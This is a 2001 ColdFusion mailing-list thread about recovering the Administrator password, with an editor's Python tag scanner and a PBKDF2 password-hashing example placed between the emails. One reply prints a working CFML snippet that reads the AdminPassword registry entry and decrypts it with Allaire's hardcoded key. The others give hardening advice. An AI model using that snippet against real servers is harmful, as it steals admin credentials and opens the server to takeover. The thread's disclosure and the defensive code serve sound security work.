Go to the CF Admin, under 'Basic Security' is a list of tags you can
disable. That's of course just the first step towards securing the server.
If you're running a shared environment make sure to grab the Allaire patch to
disable the CF Admin undocumented tags/functions as you can do all sorts of
fun stuff w/ them. There are of course thousands of other things to be done,
so have fun.

Just a note on template encrypting: It's scarcely worth it as the server
obviously needs a fixed key (as shown below) to make it portable and has to
be an easy scheme to make the template run w/o much decryption overhead.
Anyone w/ even basic knowledge of DES encryption and programming can sit
down and reverse engineer the simplistic algorithm used. The proliferation
of decryption binaries and the original key phrase now (I hadn't actually seen
that before) makes it a waste of server resources.
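The first step suggested above (turning CFREGISTRY off in the Administrator) can be backed up by checking what the templates on a shared box actually use. The following scanner is an added example, not code from the thread or from Allaire: it walks a set of CFML sources, reports every use of a watched tag with its line number, and marks whether a CFREGISTRY call reaches into the ColdFusion server branch named in the thread. CFREGISTRY comes from the thread; the other two tag names and the sample templates are the editor's own choices.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Tags to flag. CFREGISTRY is the one discussed in the thread; CFEXECUTE and
# CFFILE are standard ColdFusion tags added here as the editor's assumption of
# what a hosting provider would also want to keep an eye on.
WATCHED_TAGS = ("cfregistry", "cfexecute", "cffile")

# Registry branch quoted in the thread: where the CF Administrator password lives.
ADMIN_BRANCH = r"HKEY_LOCAL_MACHINE\SOFTWARE\Allaire\ColdFusion\CurrentVersion\Server"

# Match a whole opening tag, including attributes that span several lines
# (the thread's own CFREGISTRY call is split across four lines).
TAG_RE = re.compile(
    r"<\s*(" + "|".join(WATCHED_TAGS) + r")\b[^>]*>",
    re.IGNORECASE | re.DOTALL,
)


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    tag: str
    touches_admin_branch: bool


def scan_template(path: str, source: str) -> list[Finding]:
    """Return one Finding per watched tag found in a single template."""
    findings = []
    for m in TAG_RE.finditer(source):
        # Line number of the tag's opening '<' (1-based).
        lineno = source.count("\n", 0, m.start()) + 1
        body = m.group(0).lower()
        findings.append(
            Finding(
                path=path,
                line=lineno,
                tag=m.group(1).lower(),
                touches_admin_branch=ADMIN_BRANCH.lower() in body,
            )
        )
    return findings


def scan_many(templates: dict[str, str]) -> list[Finding]:
    """Scan a mapping of path -> template source, preserving input order."""
    out: list[Finding] = []
    for path, src in templates.items():
        out.extend(scan_template(path, src))
    return out


# Constructed sample templates standing in for a customer's web root.
SAMPLE_TEMPLATES = {
    "index.cfm": "<cfset greeting = 'hello'>\n<cfoutput>#greeting#</cfoutput>\n",
    "peek.cfm": (
        "<CFSET key = 'x'>\n"
        "<CFREGISTRY ACTION=GET\n"
        "  Branch=\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Allaire\\ColdFusion\\CurrentVersion\\Server\"\n"
        "  Entry=\"AdminPassword\"\n"
        "  Variable=\"pw\">\n"
    ),
    "upload.cfm": "<cffile action=\"upload\" destination=\"/tmp\" filefield=\"f\">\n",
}


if __name__ == "__main__":
    for f in scan_many(SAMPLE_TEMPLATES):
        flag = "  <-- reads the CF server branch" if f.touches_admin_branch else ""
        print(f"{f.path}:{f.line}: <{f.tag}>{flag}")
```

Run as-is it prints the two hits in the constructed samples; pointed at a real document root it is a quick way to see which accounts would break if the tag is disabled, and which ones were already reading the server's registry branch.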


-----Original Message-----
From: John Fix 3rd [mailto:[EMAIL PROTECTED]]
Sent: March 10, 2001 07:57
To: CF-Talk
Subject: RE: Finding the CF Administrator password


How does one disable CFRegistry?

Thanks!

John

-----Original Message-----
From: CF [mailto:[EMAIL PROTECTED]]
Sent: Saturday, March 10, 2001 10:48 AM
To: CF-Talk
Subject: Re: Finding the CF Administrator password


Yeah .. someone sent me the key a little earlier and it worked like a
charm. Actually, this other person also showed me how to find the key to
begin with ... it's amazingly simple.  I don't see why you should be
flamed .. people should not have CFRegistry active on a machine where
they wouldn't want people getting in and doing stuff like this anyway.
This is just another great example of why ;)

Todd Ashworth
Web Application Developer
Network Administrator

Saber Corporation
314 Oakland Ave.
Rock Hill, SC 29730
(803) 327-0137 [111] (p)
(803) 328-2868 (f)

----- Original Message -----
From: "Dain Anderson" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Saturday, March 10, 2001 12:07 AM
Subject: Re: Finding the CF Administrator password


> Todd,
>
> It's very easy to retrieve the admin password, and I'm sure I will get
> flamed for showing this, but what the hell:
>
> <CFSET CFKey = "4p0L@r1$">
>
> <CFREGISTRY ACTION=GET
>       Branch="HKEY_LOCAL_MACHINE\SOFTWARE\Allaire\ColdFusion\CurrentVersion\Server"
>       Entry="AdminPassword"
>       Variable="AdminPassword">
>
> <CFOUTPUT>
>       Registry Password: #CFusion_Decrypt(AdminPassword, CFKey)#
> </CFOUTPUT>
>
> The key to decrypt it spells "4 Polaris" (Allaire inside joke?) --
> this isn't my doing; rather, I was sent this from an anonymous source
> via the [EMAIL PROTECTED] address. I hope this will show Allaire
> and ISPs that there is a need for encryption, not encoding, for things
> such as this. I am against template encryption personally, but the
> administrator feature should have much better security. We live and
> learn, strive and yearn.
>
> Dain Anderson
> Caretaker, CF Comet
> http://www.cfcomet.com/
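The thread's underlying point is that a reversible scheme whose key ships inside the server protects nothing: anyone who can run a template on the box holds the key too. The fix a practitioner would want is not a better key but no reversible form at all; an admin password only ever needs to be checked, never read back. The block below is an added example in that spirit, not Allaire's code or anything from the thread: it stores the password as a salted PBKDF2-SHA256 digest and verifies candidates with a constant-time comparison, so the record on disk yields only a salt and a digest to whoever reads it. The record format, iteration count and salt length are the editor's own choices.

```python
from __future__ import annotations

import hashlib
import hmac
import os

ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 210_000   # editor's choice; raise it over time and rehash on next login
SALT_BYTES = 16


def hash_admin_password(password: str, *, salt: bytes | None = None,
                        iterations: int = ITERATIONS) -> str:
    """Return a self-describing record: algorithm$iterations$salt_hex$digest_hex.

    A fresh random salt per record means two stores of the same password look
    different on disk, and the digest cannot be turned back into the password.
    """
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{ALGORITHM}${iterations}${salt.hex()}${digest.hex()}"


def verify_admin_password(password: str, record: str) -> bool:
    """Recompute the digest for the candidate and compare in constant time."""
    try:
        algorithm, iters, salt_hex, digest_hex = record.split("$")
        iterations = int(iters)
        salt = bytes.fromhex(salt_hex)
        expected = bytes.fromhex(digest_hex)
    except ValueError:
        # Malformed or truncated record: refuse rather than guess.
        return False
    if algorithm != ALGORITHM or iterations <= 0:
        return False
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(actual, expected)


def needs_rehash(record: str, minimum_iterations: int = ITERATIONS) -> bool:
    """True when the stored record uses fewer iterations than current policy."""
    try:
        algorithm, iters, _salt_hex, _digest_hex = record.split("$")
        return algorithm != ALGORITHM or int(iters) < minimum_iterations
    except ValueError:
        return True


if __name__ == "__main__":
    # Constructed demonstration values.
    record = hash_admin_password("correct horse battery staple")
    print("stored:", record)
    print("right password:", verify_admin_password("correct horse battery staple", record))
    print("wrong password:", verify_admin_password("4 Polaris", record))
    print("needs rehash:", needs_rehash(record))
```

Contrast this with the thread: the registry value plus the constant in the server is enough to print the plaintext, whereas here the same level of access (reading the stored record) gives an attacker a salt and a digest and nothing to decrypt.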

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists